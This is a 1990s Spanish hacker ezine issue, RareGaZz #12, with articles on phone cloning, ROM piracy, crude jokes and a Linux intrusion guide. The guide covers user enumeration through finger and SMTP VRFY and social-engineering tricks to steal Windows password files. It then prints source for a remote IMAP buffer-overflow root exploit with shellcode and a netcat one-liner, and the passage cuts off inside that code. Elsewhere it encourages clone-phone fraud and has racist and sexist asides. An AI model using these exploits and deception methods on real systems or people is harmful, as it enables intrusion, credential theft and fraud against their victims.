Copy Link
Add to Bookmark
Report

RareGaZz Issue 12

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  

<<::RareGaZz::>>
presenta

Numero #12
~~~~~~~~~~~~~~~~~~~~

Contenido
=========

1.- Introduccion
2.- Que diablos es PCS???? -Azumlord-
3.- Nintendo Emus -Yo Soy-
4.- 100 razones por las que es maravilloso ser hombre -Lobo-
5.- Hackeando un sistema Linux -Ironbox-
6.- Hacking Win95 -12r43l Overdrive-
7.- Como conseguir Warez -Sergii-
8.- UNIX: sistema de archivos -GuyBrush-
9.- Easter eggs -Cytorax-
10.- Antes de ser Phreaker -El Emperador-
11.- Cartas del lector -GuyBrush-
12.- Noticias
13.- Despedida


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

@=@=@=@=@=@=@=@=@=@=@
() ()
() INTRODUCCION ()
() ~~~~~~~~~~~~ ()
@=@=@=@=@=@=@=@=@=@=@

Una vez mas estamos con vosotros. Como veis hemos hecho algunos cambios en
la Web pero seguimos con las mismas ganas de mantenernos al pie del ca¤on.

Hemos recibido numerosos mails preguntandonos si nos habia pasado algo, y
por que no actualizabamos la web ni funcionaba nuestro correo. Bien, hemos
tenido algunos problemillas pero ya esta todo solucionado. Para que todos
os podais enterar voy a comentaros un poco los cambios que hemos sufrido
contestando a este peque¤o FAQ:

1) Que paso con RareTrip?
Estara ausente durante algun tiempo por motivos mayores.
2) Que paso con KillerBoot, ServerHacker, MisterX, LePompeitor, ...?
Tambien estan temporalmente ausentes.
3) Quien llevara entonces la Web?
En principio, GuyBrush (yo), Azumlord y Cytorax.
4) Que cambios va a sufrir RareGaZz?
- Nueva pagina Web -> Esto es algo habitual, pues ya sabeis que
cada cierto tiempo la modificamos.
- Nueva direccion de correo -> A partir de ahora debeis escribir
a esta direccion:
'raregazz@iname.com'
- Nueva mailing-list -> La nueva lista sera:
'raredudez@coollist.com'. Hemos perdido
la otra lista por lo que NO HAY NADIE
subscrito. Todo el que quiera formar
parte de la lista que mande un mail a
RareGaZz con el subject:
'subscribe <direccion de correo>'
- Nueva llave PGP -> La antigua llave ya no funciona porque hemos
perdido el llavero. Acordaros de actualizar
vuestro PGP con la llave que viene al final
del zine. Tambien la podeis encontrar en la
web.
5) Quien sustituye a RareTrip?
De momento yo (GuyBrush). RareTrip me pidio que me ocupara de la
direccion de RareGaZz durante su ausencia y aunque no este ahora
mismo con nosotros, sigo manteniendo contacto con el, por lo que
me va indicando los cambios que debemos realizar.
6) Quien es el nuevo lider de RareGaZz?
El lider sigue siendo RareTip. Como ya he dicho, sigo sus
instrucciones.
7) Por que no se actualizan los mirror de RareGaZz?
De momento solo vamos a actualizar la pagina de islatortuga.
Pronto espero actualizar los mirror tambien. Es muy probable que
acapulco empiece a funcionar pronto.

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ<|( Que diablos es PCS???? )|>ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄ<|( Traducido al espa¤ol por Azumlord )|>ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Bueno este texto no fue originalmente escrito por mi, yo solo hize la
traduccion al espa¤ol, originalmente fue escrito por KungFuFox de THTJ pero
considero que es interesante puesto que esta tecnologia es realmente nueva
aqui en Mexico, en fin si quieres saber mas sobre lo que sucede encuanto a
Telecomunicaciones en Mexico aqui encontraras buena info:

http://www.cft.gob.mx ----> Duh!!!!!

Has oido algo sobre PCS? Si? Bien. Sus siglas significan Personal
Communications Service(Servicio de Comunicacion Personal). El problema con
PCS es que no es amigable con el phreaking. Increiblemente, a la gente normal
no le gusta el PCS cuando ven sus recibos por miles de dolares cuando ellos
solo recuerdan que su unica llamada fue al 911 para reportar que vieron a
un muchacho negro en su vecindario. La rason de que se adoptado mas rapido
que un ni¤o gordo en Etiopia es porque algunos pendejos del crimen organizado
y/o de los carteles de droga han estado clonando muhos celulares, y como
dije antes, la gente odia eso.

Las redes PCS transmiten en un frecuencia mas alta que la que usan
los actuales sistemas celulares, entre 1850MHz y 2200Mhz, comparados con los
800MHz de la banda usada por los actuales sistemas celulares. Estas redes de
PCS son todas digitales, esto significa mejor calidad de transmision y la
capacidad del cliente es mas alta. La razon detras de necesitar una capcidad
mas alta esque los radiofonistas(Los que usan la radio pa' comunicarse, Duh!),
se estan expandiendo como un mapache hambriento en una tienda de donas.
Actualmente hay 52,687,924 usarios de la radio, un numero que se espera se
incremente en un futuro. Dije "se espera se incremente en un futuro" mejor
dicho que una cifra o una fecha porque he visto diferentes numeros
desordenados de diferentes fuentes. Incluso la gente de la radiofonia es tan
estupida para saber como estara su indutria en 30 meses. El mercado de el PCS
se expandera rapidamente, creciendo relativamente de unos cuanto clientes
ahora a un estimado de 15 millones para el a¤o 2000.

Sobre el 3 porciento de el ingreso de la radiofonia en 1996 viene del
fraude celular, aunque el porcentaje ha sido 6 porciento mas alto que a
principios de esta decada. La cantidad de dinero perdida por este de fraude,
en 1995 es mas o menos por los $650 millones de dolares, y ha sido un gran
factor detras de la adopcion de el PCS sobre el celular (no porque las
compa¤ias de celulares quieran obtener mas dinero de ti), porque PCS ofrece
un excelente manejabilidad de los rasgos de seguridad para evitar los intentos
de clonacion.


Los rasgos de seguridad de el pasado como llamar al clon y tratar
de "ponerle una chinga" son lentos pero seguramente seran reemplazados con
los rasgos encontrados solo en las redes de PCS, como la radio frecunecia
fingerprinting, que vincula la igualacion de un ESN de un radiotelefono con
otro numero de identidad unico para la cuenta del usuario. Si esos numeros
no son iguales tu clon no funcionara por mas de una semana, al mismo tiempo
el usuario recibira alertas automaticas cuando un fraude es detectado (Pero
eso te da suficiente tiempo para hacer un par de miles de llamadas a tu
BBS favorito en Alemania).

Incluso Celulares y PCS comparten formas para prevenir el fraude.
Como el software usado por las compa¤ias de tarjetas de credito para detectar
patrones de compra irregulares, este software ha sido desarrollado para el
uso con los servicios de telefonia inalambrica para detectar patrones
sospechosos de llamadas, como llamadas sorpresivas y recientes a Cali,
Colombia o llamadas frecuentes a 1900quierosexo. Estas actividad sospechosa
es reportada y usualmente esto significa la muerte del clon.

RoamEx, una red internacional de intercambio de datos, mantiene las
huellas de la actividad de llamadas que un usuario de celulares y PCS tiene
y estas huellas son inmediatamente accesibles al provedor del usuario. La
actividad sospechosa de llamadas es investigada y es posible que lleve a
la aniquilacion del clon. Algunos servicios radiofonicos establen 'perfiles'
para describir el tipo de llamadas que un determinado usuario quiera hacer,
como el no-roaming, interestatal, etc. Llamadas que son hechas fuera del
perfil requieren el uso de un PIN Personal Identification Number(Numero
personal de Identificacion) para poder permitir a la llamada conectarse, lo
cual no significa que tengas que robar el PIN de alguna persona, mejor solo
habla con todos en tu area local un ciento de veces.

Todo en todo, las grandes ventajas de el PCS sobre los celulares es
que este usa toda la tecnologia digital, haciendolo mucho menos vulnerable
al robo de ondas de aire, y es compatible con la tecnologia GSM (por supuesto,
las compa¤ias radiofonicas QUIEREN que tu pienses que el precio mas alto es
una ventaja). Global Systems for Mobile Communications(Sistemas Globales para
Comunicaciones Mobiles) (GSM) es una tecnologia digital y es la mas avanzada
en su tipo en la radiofonia mundial. Ofrece una gran cantidad de servicios
que sistemas que no son GSM no tiene, por ejemplo, voz, datos, fax y capacidades
de pageo integradas, pero la mas importante es que elimina la clonacion e
indiscrecion. GSM tambien ofrece la unin de roaming atravez de America del
Norte, y permita aun mas rasgos de seguridad personalisada con el uso de
la tecnologia de la Smart Card, que esta disponble en la telara¤a mundial.

La unica verdadera ventaja que los celulares actualmente tienen sobre
el PCS es la cobertura de costa a costa, la cual no existe en areas donde los
provedores han desabilitado el roaming para evitar los patrones de fraude, y
las lineas amigables con el phreak.

Como se definio antes, los servicos de el PCS utilizando el GSM tienen una
cobertura de costa a costa, pero no se chinga al logo de "amigable con el
phreack(c)"
. Los celulares aun son mas populares que el PCS y la gran parte
de esto se debe al costo. A medida que el PCS madure el precio se ira haciendo
mas barato y por lo tanto mas aceptado, y eso significa menos y menos
telefonos clonados. Supongo que eventualmente esa gente en el crimen
organizado tendra que robarle los telefonos a la gente directamente de sus
manos.
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<*><*><*><*><*><*><*><*><*>
<*> <*>
<*> NINTENDO EMUS <*>
<*> ~~~~~~~~~~~~~ <*>
<*><*><*><*><*><*><*><*><*>


Por ahora solo les vamos a hablar de los emuladores de las consolas de
videojuegos de la casa Nintendo y donde conseguir algunas roms :), si
no sabes lo que son las roms leete RareGaZz #10.

El sistema nintendo de 8 bits (NES) tiene varios emuladores de entre
los cuales a mi parecer el mejor es:

- Nesticle 0.43 de Bloodlust Software.

Este emulador emula la mayoria de las roms que existen, por no decir
todas :), y el aspecto de este emulador tiene un tipo de Front End para hacer
mas sencilla la tarea. Si deseas este emulador, no tienes mas que pasarte
por la pagina de Software de RareGaZz. Y si quieres roms en la pagina tambien
te las facilitan.

El Super Nintendo es una de las consolas de videojuegos mas popular , y su
emulacion se realiza con mas dificultad debido a que existen juegos en los
que es necesario contar con cierto tipo de hardware para ser jugado , ( chips
como el FX de Nintendo o el CX4 de Capcom ) que generalmente son usados para
mejorar los graficos. En esta consola existen varios emuladores que ahi se
van, pero los que llevan la delantera es el Snes9X, Zsnes y el Esnes.

Por cierto, de el Snes9X ya estaba la version final del emulador (aunque
no emulaba ningun juego con chip, asi que no podias jugar Yoshi Story, etc)
pero hace poco el emulador ha sido traspasado a otras personas quienes estan
dispuestos a emular el Chip FX y que proximamente podras tener en tus manos.
El emulador en verdad es bueno, tan rapido como la consola verdadera aunque
depende del tipo de computadora que tengas. Lo mas recomendable es contar con
una Pentium.

El Zsnes es un emulador que no ha parado de sacar versiones, es decir, cada
vez puede que te lleves una sorpresa con el ( por ejemplo, pueden sacar hasta
tres versiones en 1 semana ). Si deseas bajar el emulador paseate por las
paginas oficiales de cada emu, donde siempre te encontraras con las ultimas
versiones o visita http://www.davesclassics.com/. Si lo que quieres es roms
de snes las puedes encontrar en la siguiente direccion:
http://snesmerism.deemon.com

La Pagina Oficial del Snes9x -----> http://www.euronet.nl/users/jkoot/
La Pagina Oficial del Zsnes -----> http://www.csoft.net/zsnes

El Gameboy es una de las primeras consolas que fueron emuladas, el mejor
emulador es el GB97 y el VGB, los dos aceptan Joystick y sonido.
El VGB,( Virtual Gameboy ) puede ejecutar aproximadamente el 85% de las roms
y tambien hay versiones para Linux :), el GB97 es muy bueno tambien.

- VGB 0.88 ---->http://www.davesclassics.com/
- GB97 2.937 ---->http://www.davesclassics.com/

Si quieres roms de Game Boy las puedes encontrar en
http://home5.swipnet.se/~w-52849/indsex.htm o si quieres alguna rom que no
has podido encontrar mandame un mail pidiendola ( solo GB ).

Los beneficios de los emuladores son varios, como es el jugar tus juegos
favoritos gratis, jugar los ultimos juegos, jugar juegos japoneses que por
ciertas razones no llegan a America y es dificil encontrarlos, etc.

Bueno, por ahora eso es todo, si te interesa esto puedes buscar informacion
en una page de emuladores (muchas) o en el canal #emuladores del Irc Hispano
o en el canal #emu de Undernet.

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

[.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.]
[.] [.]
[.] 100 RAZONES POR LAS QUE ES MARAVILLOSO SER HOMBRE [.]
[.] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [.]
[.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.]

1.Las conversaciones telefonicas duran 30 segundos
2.En las peliculas los desnudos son casi siempre femeninos
3.Sabes cosas sobre coches y tanques
4.Vacaciones de 5 dias requieren solo una maleta
5.Futbol los domingos, lunes, martes, miercoles...
6.No tenes que estar al dia de la vida sexual de tus amigos
7.Las colas al baño son 80% menores
9.A los viejos amigos no les importa si subiste o bajaste de peso
10. En las peluquerias no te roban
11. Mientras haces zapping, no tienes que parar cada vez que ves a
alguien llorando
12. Tu culo no es un factor en entrevistas de trabajo
13. Todos tus orgasmos son reales
14. Una panza de cerveza no te hace invisible al otro sexo
16. No tenes que llevar un bolso lleno de estupideces a todos lados
17. No tienes que taparte la falda cada vez que subes una escalera en
un lugar publico
18. Puedes ir al baño sin ir en grupo
19. Tu apellido permanece
20. Puedes dejar la cama de un hotel sin hacer
21. Cuando tu trabajo es criticado, no tenes que pensar que todos
secretamente te odian
24. Te dan mas credito por el menor acto de inteligencia
26. Nadie piensa secretamente si " te la tragas "
27. Nunca tienes que limpiar el inodoro
28. Podes estar bañado y listo en 10 minutos
29. En el sexo nunca tienes que preocuparte por tu reputacion
30. Los planes de la boda se arreglan solos
31. Si alguien se olvida de invitarte a algun lado, todavia puede ser
tu amigo/a
32. Tu ropa interior cuesta un 60% menos
34. Ninguno de tus colegas de trabajo tiene la capacidad de hacerte
llorar
35. No tenes que afeitarte del cuello para abajo
37. Si tenes 34 y eres soltero a nadie le importa
39. Puedes apuntarte a un campeonato de mear
40. Toda tu cara se queda del mismo color
42. Puedes ser presidente
43. Puedes disfrutar silenciosamente de un paseo en coche
44. Las flores siempre lo arreglan todo
45. Nunca tienes que preocuparte de los sentimientos de otras personas
46. Piensas sobre sexo el 90% de las veces cuando te despiertas
47. Puedes llevar una camiseta blanca a un lugar con mucha agua que
salpique
48. Tres pares de zapatos son mas que suficientes
50. Puedes decir cualquier cosa y no preocuparte por lo que piensa la
gente
51. "Jugar " antes del sexo es opcional
52. Luis Miguel, Tom Cruise y los demas no existen en tu universo
54. Te puedes quitar la camiseta cuando hace calor
55. No tienes que limpiar tu apartamento cada vez que entre alguien
57. Los mecanicos no te mienten
58. Te importa un carajo si alguien se da cuenta o no de tu nuevo
corte de pelo
59. Puedes ver television con un amigo, en total silencio por horas,
sin pensar " debe estar enojado conmigo "
64. Un estado de animo, todo el tiempo
65. Puedes admirar a Clint Eastwood sin matarte de hambre tratando de
parecerte a el
66. No tienes que conducir hasta otra estacion de servicio porque esta
es muy sucia
67. Sabes por lo menos 20 formas de abrir una cerveza
68. Podes sentarte con las piernas abiertas sin importar que estes
vistiendo
69. Mismo trabajo... mas paga
70. Pelo gris y arrugas quedan bien
72. Vestido de bodas: 200.000; Traje alquilado: 10.000
73. No te importa si alguien habla a tus espaldas
74. Siempre hay algun partido en la television
75. No sacas pedacitos de los postres de otros
77. El control remoto es solo tuyo
78. La gente nunca echa miraditas a tu pecho cuando le hablas
80. Puedes pasar a visitar un amigo sin tener que llevarles un regalo
83. Puedes comprar condones sin que el cajero te imagine desnudo
85. Si no llamas a un amigo cuando dijiste que lo ibas a llamar, no le
va a decir a tus amigos que cambiaste
86. Algun dia, puedes llegar a ser un atorrante viejo verde
87. Puedes racionalizar cualquier cosa con la frase " !Y, a la mierda!
88. Si alguien aparece en una fiesta con tu misma ropa, podes llegar a
hacerte amigo
90. Un buen eructo es casi casi predecible
91. Nunca te pierdes una experiencia sexual porque "
no quieres "
95. Las peliculas porno estan disenadas para ti
96. No tienes que recordar fechas de cumpleanos y aniversarios
97. Que no te caiga bien una persona no quita tener buen sexo con ella
100. Con 400 millones de esparmatozoides por tiro, podrias doblar la
poblacion de la tierra, al menos en teoria..

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

**********************************************************************
* *
* HACKEANDO UN SISTEMA LINUX *
* -------------------------- *
**********************************************************************


Como todo el mundo sabra ya, linux es cada vez mas popular entre los usuarios.
Usar linux es guay y mucha gente que antes le daba la espalda ahora se
encuentra con linux instalado en su disco duro. Pero no todo va a ser tan
bonito, linux es un muy buen sistema operativo, pero como todo,tiene fallos.
En este texto voy a intentar explicar algunos metodos para conseguir hackear
un sistema linux. Lo hago con este sistema ya que es el mas conocido,aunque
muchas cosas son exportables a otros sistemas operativos parecidos,como bsd,
sunOS y cualquier otro derivado de unix.



1.- Consiguiendo informacion de la maquina.
************************************************


Una de las cosas mas importantes a la hora de hackear un sistema (o intentar)
es obtener la maxima informacion disponible sobre el. En definitiva se trata
de obtener las versiones de sus daemons,como pueden ser ftp,sendmail,etc, los
puertos que tiene abiertos y toda informacion que nos pueda ser util.

Para conseguir las versiones de los demonios se accede al puerto en cuestion,
y normalmente solo con eso se nos muestra una linea o dos con informacion.Aqui
pongo una lista de los puertos completa,ya se que completa es un coñazo pero
la pongo por si a alguien le es util.


**** LISTA DE PUERTOS *****


tcpmux 1/tcp # rfc-1078
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp
domain 53/udp
mtp 57/tcp # deprecated
bootps 67/udp # bootp server
bootpc 68/udp # bootp client
tftp 69/udp
gopher 70/tcp # gopher server
rje 77/tcp
#finger 79/tcp
#http 80/tcp # www is used by some broken
#www 80/tcp # progs, http is more correct
link 87/tcp ttylink
kerberos 88/udp kdc # Kerberos authentication--udp
kerberos 88/tcp kdc # Kerberos authentication--tcp
supdup 95/tcp # BSD supdupd(8)
hostnames 101/tcp hostname # usually to sri-nic
iso-tsap 102/tcp
x400 103/tcp # x400-snd 104/tcp
csnet-ns 105/tcp
#pop-2 109/tcp # PostOffice V.2
#pop-3 110/tcp # PostOffice V.3
#pop 110/tcp # PostOffice V.3
sunrpc 111/tcp
sunrpc 111/tcp portmapper # RPC 4.0 portmapper UDP
sunrpc 111/udp
sunrpc 111/udp portmapper # RPC 4.0 portmapper TCP
auth 113/tcp ident # User Verification
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/tcp # Network Time Protocol
ntp 123/udp # Network Time Protocol
#netbios-ns 137/tcp nbns
#netbios-ns 137/udp nbns
#netbios-dgm 138/tcp nbdgm
#netbios-dgm 138/udp nbdgm
#netbios-ssn 139/tcp nbssn
#imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp
snmp-trap 162/udp
exec 512/tcp # BSD rexecd(8)
biff 512/udp comsat
login 513/tcp # BSD rlogind(8)
who 513/udp whod # BSD rwhod(8)
shell 514/tcp cmd # BSD rshd(8)
syslog 514/udp # BSD syslogd(8)
printer 515/tcp spooler # BSD lpd(8)
talk 517/udp # BSD talkd(8)
ntalk 518/udp # SunOS talkd(8)
efs 520/tcp # for LucasFilm
route 520/udp router routed # 521/udp too
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc # experimental
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # BSD uucpd(8) UUCP service
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs # Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
pcserver 600/tcp # ECD Integrated PC board srvr
mount 635/udp # NFS Mount Service
pcnfs 640/udp # PC-NFS DOS Authentication
bwnfs 650/udp # BW-NFS DOS Authentication
kerberos-adm 749/tcp # Kerberos 5 admin/changepw
kerberos-adm 749/udp # Kerberos 5 admin/changepw
kerberos-sec 750/udp # Kerberos authentication--udp
kerberos-sec 750/tcp # Kerberos authentication--tcp
kerberos_master 751/udp # Kerberos authentication
kerberos_master 751/tcp # Kerberos authentication
krb5_prop 754/tcp # Kerberos slave propagation
listen 1025/tcp listener RFS remote_file_sharing
nterm 1026/tcp remote_login network_terminal
#kpop 1109/tcp # Pop with Kerberos
ingreslock 1524/tcp
tnet 1600/tcp # transputer net daemon
cfinger 2003/tcp # GNU finger
nfs 2049/udp # NFS File Service
eklogin 2105/tcp # Kerberos encrypted rlogin
krb524 4444/tcp # Kerberos 5 to 4 ticket xlator
irc 6667/tcp # Internet Relay Chat

-----------------


Bueno,despues de todo este rollo os pregutareis: y cuales son realmente los
puertos importantes?? Pues bien,los realmente importantes (mas o menos) son:
el ftp(21),telnet(23),sendmail(25),finger(79),http(80),pop(110) y imap(143).
Estos son (para mi al menos) los que mas usaremos a la hora de hackear.

Para sacar informacion de cada uno de ellos basta con ir haciendo telnets uno
por uno. Ej: telnet maquina.com 21 --> te dije la version del ftp, telnet ma-
quina.com 23 --> te dice la version del sistema operativo(normalmente), y asi
con todos. Recomiendo que a la hora de mirar versiones,etc. no intenteis meter
ningun password porque quedara todo grabado junto con vuestra direccion ip.

Tambien es interesante hacer un scaneo de puertos a la maquina. Hay muchos pro-
gramas en internet que hacen esta funcion. Yo recomiendo el phobia, que es bas-
tante rapido. Estos programas a veces traen opciones para scanear solo un de-
terminado numero de puertos, por ejemplo del 1 al 200. El phobia trae tb po-
sibilidades de ataque,como sobreescribir un buffer en el ftpd,etc. pero que
ya tiene mucho tiempo y es improbable que funcione.


1.1.- POSIBILIDADES DEL FINGER Y SMTP.
----------------------------------

El puerto del finger(79) se usa para conseguir informacion de los usuarios
de esa maquina. Se usa simplemente con: telnet maquina.com 79. Si obteneis
una respuesta como: "
telnet: Unable to connect to remote host: Connection
refused", es que o tiene activado un firewall(esto ya se vera mas adelante)
o tiene cerrado el puerto del finger. Si se conecta sin problemas,simplemente
tecleando un nombre de usuario conseguireis informacion sobre el.No os preo-
cupeis si lo que escribais no sale en pantalla,es porque tiene el eco redire-
ccionado a una salida nula. Si por ejemplo tecleais "
test",y resulta que al-
guien tiene ese nombre de usuario(login), os saldra algo como esto:

Login: test Name: Jose Ramon Suarez
Directory: /home/test Shell: /bin/bash
Last login Sat May 9 00:16 (CEST) on tty3
No mail.
No Plan.


Como veis se muestra mucha informacion util,como su nombre completo,su direc-
torio home,si tiene mail,etc.. Esto puede ser usado para intentar algun pass,
como joramon..ya entendeis. Tambien podeis mandarle un mail haciendos pasar por
el root del sistema y pidiendole su password con alguna excusa,pero esto ya
esta muy visto y no creo que funcione,ademas,como se lo diga al root de verdad
y no hayais usado un metodo para mandar mails anonimos..pillais,no? :).

Tb puede usarse el sendmail(25) para conseguirse un resultado similar. La
cuestion es que muchos proovedores de internet (por lo menos en españa), en vez
de usar un servidor para correo entrante(pop-110) y otro para correo saliente
(smtp-25) pues usan uno solo para las dos cosas,y si usan dos pues en el de
correo entrante dejan abierto el puerto de smtp. Pues bien,si haceis un telnet
al servidor de correo entrante al puerto 25,y luego usais el comando vrfy para
verificar si existe un usuario en cuestion muchas veces os devolvera el nombre
del usuario completo. Ejemplo:

Un tio tiene de mail jose@ctv.es. Pues poneis; telnet pop.ctv.es 25 --> luego,
vrfy jose , y os devolvera algo como: Jose Luis Suarez Vazquez <jose@ctv.es>.
Con esto,y si sabeis la poblacion del tio, pues llamais al 003 para sacar su
telefono,lo llamais diciendo que sois de ctv....etc etc, lo demas ya lo dejo
a vuestra imaginacion :). Ademas,el servicio de finger cada vez esta mas en
desuso por lo que este metodo cobra mas importancia.

Nota: El comando expn hace la misma funcion,pero normalmente esta desactivado.



2.- CONSIGUIENDO UNA CUENTA:
********************************


Esto es una de las cosas mas dificiles (aunque parezca mentira) a la hora de
hackear. La forma mas facil de conseguirla es con ingenieria social,pero ya
esta muy visto y es muy chungo que lo consigais. Por si alguien no lo sabe
ingenieria social es intentar engañar a alguien para que te de su pass o in-
formacion util. Lo de la tia novata ya esta muy visto,o sea que yo recomiendo
nukear a alguien un par de veces,y cuando ya este el tio hasta las narices le
haceis un query y le decis algo como: "
joer,no se quien anda nukeando..no estas
protegido?", luego le enseñas como protegerse pero le dices que para saber
que puerto tiene que cerrar exactamente te tiene que mandar por dcc los files
con extension pwl de su \windows\,captais la idea,no? :). Luego crackeais el
fichero con el glide por ejemplo.

Ahora voy a centrarme ya en el Linux,lo de antes era para engañar a alguien
con win95 y poder acceder al server de su proveedor con su login:pass.

Hay varios metodos en algunas distribuciones de linux que te permiten conse-
guir una cuenta desde fuera, e incluso algunas con nivel de root.

Esta que voy a poner ahora es para RedHat,funciona hasta la version 4.0 in-
cluida y lo que hace es sobreescribir un buffer en el imap(puerto 143) con-
siguiendo una shell con nivel de root. Tienes que tener instalado el pro-
grama netcat (esta disponible en muchos lugares de la red), y se utiliza
con: "
(imap 0000000000;cat) | nc maquina.com 143", tienes que poner muchos
ceros para que rule,aunque va a ser chungo que encuentres una redhat 4.0 la
verdad. Bueno,aqui va:


---------- comienzo ----------
/*
* IMAPD REMOTE EXPLOIT
* exploit code from TiK/paladine's imap+nc exploit
* socket code by BiT
*/

#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/time.h>
#include <errno.h>

void read_soc(int sock);
void read_key(int sock);

char shell[] =
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
"
\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
"
\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
"
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"
\xe8\xc0\xff\xff\xff/bin/sh";

void phand(int s)
{
return;
}

void ihand(int s)
{
printf("
SIGINT catched, exiting...\n");
exit(4);
}

void dome()
{
printf("
IMAPD REMOTE EXPLOIT\n");
printf("
Exploit code by TiK/paladine\n");
printf("
Socket code by BiT\n\n");
}

void banner(char *wee)
{
printf("
Syntax: %s <host> [<offset>]\n",wee);
exit(1);
}

void main(int argc, char *argv[])
{
int i,a,s;
long val;
fd_set blockme;
char username[1024+255];
char buf[1500];

dome();
if(argc<2)
banner(argv[0]);

if(argc>2)
a=atoi(argv[2]);
else
a=0;

strcpy(username,shell);
for(i=strlen(username);i<sizeof(username);i++)
username[i]=0x90;
val = 0xbffff501 + a;
for(i=1024;i<strlen(username)-4;i+=4)
{
username[i+0] = val & 0x000000ff;
username[i+1] = (val & 0x0000ff00) >> 8;
username[i+2] = (val & 0x00ff0000) >> 16;
username[i+3] = (val & 0xff000000) >> 24;
}

username[ sizeof(username)-1 ] = 0;
if((s=wee(argv[1],143)) == -1) {
printf("
